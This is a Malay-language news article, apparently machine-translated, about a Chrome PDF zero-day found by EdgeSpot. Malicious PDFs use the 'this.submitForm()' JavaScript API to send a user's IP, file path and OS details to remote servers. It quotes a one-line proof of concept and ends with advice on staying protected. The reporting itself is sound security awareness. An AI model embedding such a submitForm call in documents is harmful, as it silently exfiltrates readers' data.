Perkhidmatan pengeksploitasi EdgeSpot menjumpai kerentanan Chrome sifar hari yang mengeksploitasi dokumen PDF. Kerentanan ini membolehkan penyerang menuai data sensitif menggunakan dokumen PDF berbahaya yang dibuka di Chrome.

Sebaik sahaja mangsa membuka fail PDF masing-masing di Google Chrome, program berniat jahat akan mula bekerja di latar belakang dengan mengumpul data pengguna.

Data tersebut kemudiannya dihantar kepada pelayan jauh yang dikendalikan oleh penggodam. Anda mungkin tertanya-tanya apa data yang disedut oleh penyerang, mereka menyasarkan data berikut pada PC anda:

• alamat IP
• Laluan penuh fail PDF pada sistem
• OS dan versi Chrome

Berhati-hati dengan fail PDF yang dilancarkan malware

Anda mungkin terkejut mengetahui bahawa tiada apa yang berlaku apabila Adobe Reader digunakan untuk membuka fail PDF. Di samping itu, permintaan HTTP POST digunakan untuk memindahkan data ke pelayan jauh tanpa sebarang intervensi pengguna.

Pakar melihat bahawa salah satu daripada dua domain readnotifycom atau burpcollaboratornet menerima data.

Anda boleh membayangkan intensiti serangan tersebut dengan mempertimbangkan fakta bahawa kebanyakan perisian antivirus tidak dapat mengesan sampel yang dikesan oleh EdgeSpot.

Pakar mendedahkan bahawa penyerang menggunakan "this.submitForm ()" PDF Javascript API untuk mengumpul maklumat sensitif pengguna.

Kami mengujinya dengan PoC yang minimum, panggilan API mudah seperti "this.submitForm ('http://google.com/test')" akan menjadikan Google Chrome menghantar data peribadi ke google.com.

Para pakar sebenarnya mendapati bahawa pepijat Chrome ini dieksploitasi oleh dua set fail PDF yang berniat jahat. Kedua-dua mereka diedarkan pada Oktober 2017 dan September 2018 masing-masing.

Terutama, data yang dikumpulkan boleh digunakan oleh penyerang untuk menyempurnakan serangan pada masa depan. Laporan mencadangkan bahawa kumpulan pertama fail dikumpulkan menggunakan perkhidmatan Penjejakan PDF ReadNotify.

Pengguna boleh menggunakan perkhidmatan untuk menjejaki pandangan pengguna. EdgeSpot belum berkongsi sebarang butiran mengenai sifat set kedua fail PDF.

Cara Tetap Dilindungi

Perkhidmatan pengesanan Exploit EdgeSpot ingin memberi amaran kepada pengguna pengguna Chrome mengenai potensi risiko kerana patch tidak dijangka akan dikeluarkan dalam masa terdekat.

EdgeSpot melaporkan kepada Google tentang kelemahan tahun lepas dan syarikat itu berjanji untuk melepaskan patch akhir April. H

Walau bagaimanapun, anda boleh mempertimbangkan menggunakan penyelesaian sementara untuk masalah dengan memantau dokumen PDF yang diterima menggunakan aplikasi pembaca PDF alternatif.

Sebagai alternatif, anda juga boleh membuka dokumen PDF anda dalam Chrome dengan melepaskan sistem anda dari Internet. Sementara itu, anda boleh menunggu kemas kini Chrome 74 yang dijangka akan dilancarkan pada 23 April.